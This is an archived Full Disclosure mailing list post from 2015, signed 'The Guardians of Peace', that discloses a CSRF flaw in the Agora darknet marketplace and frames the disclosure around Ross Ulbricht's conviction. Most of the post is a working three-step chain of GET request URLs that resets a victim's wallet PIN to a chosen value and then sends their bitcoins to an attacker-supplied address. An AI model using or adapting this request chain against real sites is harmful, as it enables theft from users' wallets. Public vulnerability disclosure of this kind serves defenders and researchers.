Full Disclosure mailing list archives

By Date By Thread Agora Marketplace CSRF to Steal Bitcoins (agorahooawayyfoe.onion) From: agoraagoraagora () hushmail com

Date: Wed, 18 Feb 2015 06:11:36 +0000

Ladies and gentlemen Boys and girls It come to our attention that a brave warrior for the people Ross William Ulbricht was unlawfully convicted by the corporation known as the American government. This mockery of justice has not gone unnoticed. In order to protect the next generation of darknet markets we will be disclosing vulnerabilities for these sites in order to make these sites safer from attack. To start, the Agora Marketplace contains a CSRF vulnerability which can be used to drain a victim account of all of their Bitcoins. The following URLs can be used to perform this attack: URL to start PIN reset: http://agorahooawayyfoe.onion/startresetpin?action=askresetpinaction&controller=user&confirmed=true&confirm-submit= URL to change current PIN: http://agorahooawayyfoe.onion/resetpin?pin1=1337&pin2=1337&submit=Save URL to send bitcoins using the new pin: http://agorahooawayyfoe.onion/sendbitcoins?targetaddress=[YOUR_BTC_ADDY]&withdrawschedule=0&targetamount=1&walletpin=1337&submit=Send These are all GET requests and don't require JavaScript to work. NoScript cannot save you from poor coding practices. There will be more to come. Stay safe. Stay anonymous. -The Guardians of Peace _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/ By Date By Thread Current thread: Agora Marketplace CSRF to Steal Bitcoins (agorahooawayyfoe.onion) agoraagoraagora (Feb 18)